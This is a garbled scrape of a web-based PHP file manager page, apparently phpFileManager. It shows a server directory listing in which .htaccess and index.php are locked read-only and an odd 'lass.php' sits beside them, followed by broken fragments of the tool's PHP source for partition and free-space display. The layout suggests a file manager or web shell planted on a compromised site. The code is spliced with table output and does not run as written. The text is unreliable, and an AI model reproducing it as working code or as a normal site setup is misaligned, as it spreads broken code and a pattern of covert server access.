name file | size | edit | permission | action |
---|---|---|---|---|
.htaccess | 906 KB | January 18 2024 20:05:52 | 0444 | |
css | - | February 22 2025 03:07:50 | 0755 | |
dashboard | - | February 21 2025 20:05:51 | 0755 | |
error_log | 51354 KB | February 27 2025 15:17:58 | 0644 | |
favicon.ico | 0 KB | October 18 2021 11:56:12 | 0644 | |
frontend | - | February 21 2025 20:05:51 | 0755 | |
index.php | 6518 KB | February 21 2025 20:04:34 | 0444 | |
index0.php | 1790 KB | October 18 2021 11:56:12 | 0644 | |
js | - | February 22 2025 03:23:49 | 0755 | |
lass.php | 16962 KB | February 21 2025 20:04:34 | 0644 | |
mix-manifest.json | 72 KB | October 18 2021 17:53:08 | 0644 | |
storage | - | February 22 2025 03:23:28 | 0755 | |
uploads | - | February 22 2025 03:24:05 | 0755 | |
web.config | 1211 KB | October 18 2021 11:56:12 | 0644 |
"; echo ""; echo " |
";
?>
|
Title | |
".et('EmptyDir').". | |||||||||||||||||||||||||||||||||||||||||||||||||
".et('IOError').". ".rtrim($fm_current_dir,DIRECTORY_SEPARATOR)." | |||||||||||||||||||||||||||||||||||||||||||||||||
";
if ($quota_mb) {
$out .= "
".et('Partition')." = ".format_size(($quota_mb*1024*1024))." - ".format_size(($quota_mb*1024*1024)-intval(phpfm_get_total_size($fm_current_root)))." ".et('Free')."";
} else {
$out .= "
".et('Partition')." = ".format_size(disk_total_space($fm_current_dir))." / ".format_size(disk_free_space($fm_current_dir))." ".et('Free')."";
}
/*
$out .= "
".et('RenderTime').": ".number_format((getmicrotime()-$script_init_time), 3, '.', '')." ".et('Seconds').""; */ $out .= "
".date_default_timezone_get()."
".date($date_format)." |